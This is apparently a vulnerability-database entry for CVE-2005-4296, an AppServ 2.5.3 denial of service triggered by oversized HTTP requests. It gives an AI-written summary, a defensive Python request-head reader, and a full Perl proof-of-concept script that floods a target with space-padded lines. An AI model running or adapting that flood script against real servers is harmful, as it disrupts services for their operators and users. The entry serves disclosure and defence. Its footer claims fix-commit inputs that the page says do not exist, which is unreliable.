CVE-2005-4296
Description
AppServ Open Project 2.5.3 allows remote attackers to cause a denial of service via a large HTTP request.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1- Range: = 2.5.3
Patches
Vulnerability mechanics
Root cause
"The server does not properly handle excessively large HTTP requests, leading to resource exhaustion."
Attack vector
A remote attacker can send a very large HTTP request to the vulnerable server. The exploit script sends a GET request followed by a large amount of space characters, repeatedly. This large request consumes server resources, ultimately causing a denial of service. [ref_id=1]
Affected code
The vulnerability affects AppServ Open Project version 2.5.3, particularly when running on Microsoft Windows platforms. The exact code paths or functions responsible for handling HTTP requests are not specified in the provided information.
What the fix does
The advisory does not provide details on a specific patch or fix. It indicates that AppServ Open Project 2.5.3 running on Microsoft Windows platforms is affected, and other versions may also be vulnerable. Users are advised to consult vendor advisories for remediation guidance.
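The page names no fix, so the following is an added example, not code from AppServ, the advisory or this page's sources. It shows the general server-side defence against the request shape described under Attack vector: read the request head under fixed caps and reject at the first violation. The cap values and the names `read_request_head`, `RejectRequest`, `outcome` and `PADDED` are assumptions made for the illustration.

```python
import io

# Caps are assumed values chosen for the example, not taken from any advisory.
MAX_LINE = 8190      # bytes allowed in one request or header line
MAX_HEAD = 65536     # bytes allowed in the whole request head
MAX_FIELDS = 100     # header lines allowed

class RejectRequest(Exception):
    """Raised at the first violated cap so the caller can close the socket."""

def read_request_head(stream, max_line=MAX_LINE, max_head=MAX_HEAD,
                      max_fields=MAX_FIELDS):
    """Return (request_line, headers) read from a binary stream under caps."""
    total, request_line, headers = 0, None, []
    while True:
        # readline(n) returns at most n bytes: an endless line cannot grow memory.
        line = stream.readline(max_line + 1)
        total += len(line)
        if len(line) > max_line:
            raise RejectRequest("line too long")
        if not line.endswith(b"\n"):
            raise RejectRequest("incomplete head")
        if total > max_head:
            raise RejectRequest("head too large")
        text = line.rstrip(b"\r\n")
        if request_line is None:
            if len(text.split(b" ")) != 3:
                raise RejectRequest("malformed request line")
            request_line = text
        elif text == b"":
            return request_line, headers          # blank line ends the head
        else:
            name, sep, value = text.partition(b":")
            if not sep or not name or name != name.strip():
                raise RejectRequest("malformed header")  # e.g. a line of spaces
            if len(headers) >= max_fields:
                raise RejectRequest("too many headers")
            headers.append((name.lower(), value.strip()))

def outcome(data):
    """Run the reader over constructed bytes; report result and bytes consumed."""
    stream = io.BytesIO(data)
    try:
        read_request_head(stream)
        return "accepted", stream.tell()
    except RejectRequest as exc:
        return str(exc), stream.tell()

# Constructed input: a GET line, then lines of 8000 spaces, repeated.
PADDED = b"GET / HTTP/1.0\n" + (b" " * 8000 + b"\n") * 200
```

`outcome(PADDED)` rejects on the first padding line, so the reader stops after one request line and one header line regardless of how much more the client sends.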
Preconditions
- network: The target server must be accessible over the network.
- input: The attacker must be able to send crafted HTTP requests to the server.
Reproduction
```perl
#appserv-dos.pl
#!C:\Perl\perl.exe
#C:\>perl appserv-dos.pl <tested ip> <port>
#By Rozor - !Sub_Level Security Investigation
#Thank To Miseo
#Tested In LocalHost.

sub banner {
    print("--------------------------------------------\n");
    print("| |\n");
    print("| Proof Of Concept AppServ 2.5.3 DoS |\n");
    print("| C:\>appserv-dos.pl <target> <port |\n");
    print("| |\n");
    print("| By Rozor - !Sub_Level Research |\n");
    print("| |\n");
    print("---------------------------------------------\n");
}
die banner() unless $ARGV[0];
die banner() unless $ARGV[1];

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $space = "\x20";
my $i;
my $l;
my $j;

for ($i=0; $i<8000; $i++) {
    $l.="\x20";
}
print "\n\nAppServ 2.5.3 DoS Proof Of Concept\n .:By Rozor:. !Sub_Level\n";
print "Attack...\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp') ||
    die "Error: Conection reused$@\n";
my $buffer="GET / HTTP/1.0\n";
my $m = "$l\n";
send($sock,$buffer,0) || die "Error: Send not found\n";
for($l= 0; $l <8000000000; $l++) {
    print "[ $l - 8000000000 ]\r";
    send($sock,$m,0) || die "Error: Send not found\n";
}
print "\nServer DoS Hack\n";
close($sock);
```
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.securityfocus.com/bid/15851 (nvd, Exploit)